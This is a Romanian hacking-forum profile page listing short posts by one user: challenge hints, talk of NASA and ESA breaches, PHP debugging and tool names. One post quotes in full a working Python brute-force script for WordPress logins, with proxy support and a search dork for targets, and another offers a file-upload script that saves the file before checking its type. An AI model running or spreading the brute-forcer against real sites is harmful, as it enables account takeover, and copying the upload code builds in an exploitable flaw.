nedo
Active Members-
Posts
2065 -
Joined
-
Last visited
-
Days Won
11
Everything posted by nedo
-
Arata bine, cred ca ma inscriu si eu la beta testing
-
Presupun ca trebuie sa te muti in celalalt oras. "Statia centrala". Interesant joculetul. Felicitari Synthesis, iti meriti statusul("PHP Führer")
-
@ Zatarra: esa 17.04.2011, nasa 17.05.2011 On. dap, totusi e ciudat ca nu l-am mai vazut postand pe aici ....
-
Search inainte ... a mai fost postat <-- asta este pentru isprava mai noua. Verificati blogul lui tinkode aici si vedeti de fapt de cant e treaba cu "esa". El a postat datele respective pe data de 17 aprilie.
-
07-25-2010, 02:05 PM Sunteti constienti ca asta e data ultimului post nu? Felicitari pentru reinvierea unui alt post mort.
-
havij, acunetix , scripturi in diferite limaje
-
sunt 2 la rand pe 17, ultimele 2, si 2 la rand pe 27. Cine stie o fi vreo legatura @petzy : probabil vrei sa spui de ce nu il angajeaza ca pentester. Firmele respective probabil au deja contracte cu alte firme pentru asa ceva. Nu o sa mai angajeze un om in plus. on topic, s-a cam legat de cei cu explorarea spatiului in ultima vreme, probabil se incapataneaza sa tina acele vulnerabilitati deschise si de aia ii verifica.
-
Cred ca asta este un hint destul de mare. Trebuie sa decriptezi utilizandu-te de asta.
-
Da am observat. Depinde de scriptul de lookup al fiecarui site. Unele din ele nu sunt foarte bune deci returneaza rezultate eronate sau nu returneaza nici un rezultat(pe unele asa am gasit).
-
pff, nu mai gasesc site-ul pe care am verificat eu. Ideea e ca pe ip-ul 74.125.224.148 care ti-l daca faci lookup pe google.com mai sunt hostate mai multe servicii. Tu trebuie sa gasesti unul din celelalte domenii. incearca aici cu ip-ul pe care ti-l dau ei, la chalange-ul meu mie mi-a dat ip-ul 74.125.87.103
-
dnslookup pe google.com, mai multe indicii nu iti dau
-
^^ problema e ca DOAR SPUNE, nu face nimic in plus, si in plus multe chestii le exagereaza prea mult. A nu se considera ca tin cu Base, dupa parerea mea trebuie toti dati jos de acolo si pusi niste oameni responsabili. Sunt sigur ca in tara asta se gasesc 1000 de oameni responsabili si cu capul pe umeri sa poata sa faca ce trebuie pentru tara asta.
-
Intrebare tampita: Daca este pe domeniu .ro de ce site-ul este in germana(prima poza)?
-
scuze,wildchild, nu am citit bine intrebarea ta. ... Pe langa visual studio pentru c/c++ iti recomand code blocks, mult mai usor, mult mai prietenos si mult mai intuitiv.
-
Primul este scris in c, pentru windows, al 2-lea este scris in c++ pe linux.
-
chestia e ca ori a: site-ul este inca in construcite ca vad ca sunt aiurea multe chestii b: e facut foarte foarte prost, nu sunt ascunse directoarele, ai acces la scripturile js de pe site, la toate pozele, si probabil si la alte chestii dar nu am cautat.
-
acum am realizat ca scriptul este facut pe linux. Verifica adresele de la importuri, sa fie corecte. Cand ajung acasa incerc sa vad ce si cum.
-
ai 2 else-uri aiurea else { redir('index.php?rs=ok'); } si else { redir('index.php'); } in plus ai o "}" aiurea pusa, incearca cu asta <?php include('utilities.php'); $folder="data/images/"; $foto=$folder.'file.txt'; if ($_FILES['foto']['tmp_name']) { move_uploaded_file($_FILES['foto']['tmp_name'], "$foto"); $allowedExtensions = array("txt","htm","html","xml"); if ($file['tmp_name'] > '') { if (!in_array(end(explode(".", strtolower($file['name']))), $allowedExtensions)) { die($file['name'].' is an invalid file type!<br/>'); } } //mutam "}" de aici mai jos if ( $type!= "txt") { $_SESSION['error']='<p>Eroare. Incercati din nou.</p>'; unlink($foto); redir('index.php'); } else { redir('index.php?rs=ok'); } } // aici else { redir('index.php'); } ?>
-
Cqkiller does not work anymore. It is not maintained by anyone so you can't get any code or any program .
-
are ip de upc din ce vad eu pe whois. Deci s-ar putea sa fie static, daca e cu rooter.
-
Face cam ce face orice troian, iti permite sa furi datele de la un anumit utilizator. Probabil iti permite sa faci si remote desktop/console, chestii din astea. Daca nu stii ce poate face un troian e mai bine sa te documentezi inainte sa umblii cu asa ceva pentru a nu te pune in pericol.
-
Multumim palcuiealex imi place partea finala, nu cumva asta e ceea ce fac Cheater, pax si nytro? Le: Perfect, deci 1 saptamana avem de asteptat sa vedem prezentarile
-
bf-ul este probabil luat de aici codul bf-ului este urmatorul: #!/usr/bin/python #WordPress Brute Force (wp-login.php) #If cookies enabled brute force will not work (yet) #Change response on line 97 if needed. (language) #Dork: inurl:wp-login.php #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import urllib2, sys, re, urllib, httplib, socket print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0" print "----------------------------------------------" if len(sys.argv) not in [4,5,6,7]: print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n" print "\t -p/-proxy <host:port> : Add proxy support" print "\t -v/-verbose : Verbose Mode\n" sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-p" or arg.lower() == "-proxy": proxy = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 try: if proxy: print "\n[+] Testing Proxy..." h2 = httplib.HTTPConnection(proxy) h2.connect() print "[+] Proxy:",proxy except(socket.timeout): print "\n[-] Proxy Timed Out" proxy = 0 pass except(NameError): print "\n[-] Proxy Not Given" proxy = 0 pass except: print "\n[-] Proxy Failed" proxy = 0 pass try: if verbose == 1: print "[+] Verbose Mode On\n" except(NameError): print "[-] Verbose Mode Off\n" verbose = 0 pass if sys.argv[1][:7] != "http://": host = "http://"+sys.argv[1] else: host = sys.argv[1] print "[+] BruteForcing:",host print "[+] User:",sys.argv[2] try: words = open(sys.argv[3], "r").readlines() print "[+] Words Loaded:",len(words),"\n" except(IOError): print "[-] Error: Check your wordlist path\n" sys.exit(1) for word in words: word = word.replace("\r","").replace("\n","") login_form_seq = [ ('log', sys.argv[2]), ('pwd', word), ('rememberme', 'forever'), ('wp-submit', 'Login >>'), ('redirect_to', 'wp-admin/')] login_form_data = urllib.urlencode(login_form_seq) if proxy != 0: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) opener = urllib2.build_opener(proxy_handler) else: opener = urllib2.build_opener() try: site = opener.open(host, login_form_data).read() except(urllib2.URLError), msg: print msg site = "" pass if re.search("WordPress requires Cookies",site): print "[-] Failed: WordPress has cookies enabled\n" sys.exit(1) #Change this response if different. (language) if re.search("<strong>ERROR</strong>",site) and verbose == 1: print "[-] Login Failed:",word else: print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n" sys.exit(1) print "\n[-] Brute Complete\n" problema lui este in "urllib2.py".
-
hehe, eu nu am trecut inca de lvl 1 Trebuie sa gasesc ceva intr-un domeniu nasa.gov si eventual sa fac un xss sau ceva nu? Le: am ajuns la lvl 8 si m-am blocat ... nu imi dau seama ce sa fac ...
-
@badboysby: 1 topicul este mort de mai bine de 3 ani. 2 link-ul pus mai sus de catre mihai.vest inca functioneaza. Este asa greu sa dai 3 click-uri sa il descarci ?